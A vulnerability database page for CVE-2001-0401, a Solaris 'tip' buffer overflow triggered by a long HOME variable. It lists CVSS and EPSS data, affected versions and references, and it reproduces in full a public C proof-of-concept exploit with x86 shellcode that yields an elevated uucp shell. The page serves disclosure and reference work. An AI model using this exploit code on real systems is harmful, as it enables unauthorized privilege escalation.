CVE-2001-0401 : Detail

CVE-2001-0401

0.04%V3
Local
2001-05-24
02h00 +00:00
2017-12-18
20h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Buffer overflow in tip in Solaris 8 and earlier allows local users to execute arbitrary commands via a long HOME environmental variable.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 20684

Publication date : 2001-03-26 22h00 +00:00
Author : Pablo Sor
EDB Verified : Yes

// source: https://www.securityfocus.com/bid/2475/info tip is a utility included with Sun Microsystems Solaris Operating Environment. tip allows a user to establish a full duplex terminal connection with a remote host. A problem with tip could lead to a buffer overflow. Due to the improper handling of environment variables by tip, it is possible to overflow a buffer in the program, and execute arbitrary code. The tip binary is suid uucp, and exploitation could lead to an euid of uucp. Therefore, it is possible for a local user to execute arbitrary code, and gain an euid of uucp, with the potential of gaining privileges elevated to root. #include <fcntl.h> /* /usr/bin/tip overflow proof of conecpt. Pablo Sor, Buenos Aires, Argentina 03/2001 [email protected] works against x86 solaris 7,8 default offset should work. */ long get_esp() { __asm__("movl %esp,%eax"); } int main(int ac, char **av) { char shell[]= "\xeb\x0a\x9a\x01\x02\x03\x5c\x07\x04\xc3\xeb\x05" "\xe8\xf9\xff\xff\xff\x5e\x29\xc0\x88\x46\xf7\x89\x46\xf2" "\x50\xb0\x8d\xe8\xe0\xff\xff\xff\x6a\x05\x90\xb0\x17\xe8\xd6\xff\xff\xff" "\xeb\x1f\x5e\x8d\x1e\x89\x5e\x0b\x29\xc0\x88\x46\x19\x89\x46\x14" "\x89\x46\x0f\x89\x46\x07\xb0\x3b\x8d\x4e\x0b\x51\x51\x53\x50\xeb\x18" "\xe8\xdc\xff\xff\xff\x2f\x74\x6d\x70\x2f\x78\x78\x01\x01\x01\x01\x02\x02" "\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; unsigned long magic = get_esp() + 0x50; /* default offset */ unsigned char buf[600]; symlink("/bin/ksh","/tmp/xx"); memset(buf,0x90,600); buf[599]=0; memcpy(buf+(sizeof(buf)-strlen(shell)),shell,strlen(shell)); memcpy(buf,"HOME=",5); memcpy(buf+265,&magic,4); putenv(buf); system("/usr/bin/tip 5"); unlink("/tmp/xx"); }

Products Mentioned

Configuraton 0

Sun>>Solaris >> Version 2.6

Sun>>Sunos >> Version To (including) 5.9

Sun>>Sunos >> Version 5.5

Sun>>Sunos >> Version 5.5.1

Sun>>Sunos >> Version 5.7

References

http://www.securityfocus.com/bid/2475
Tags : vdb-entry, x_refsource_BID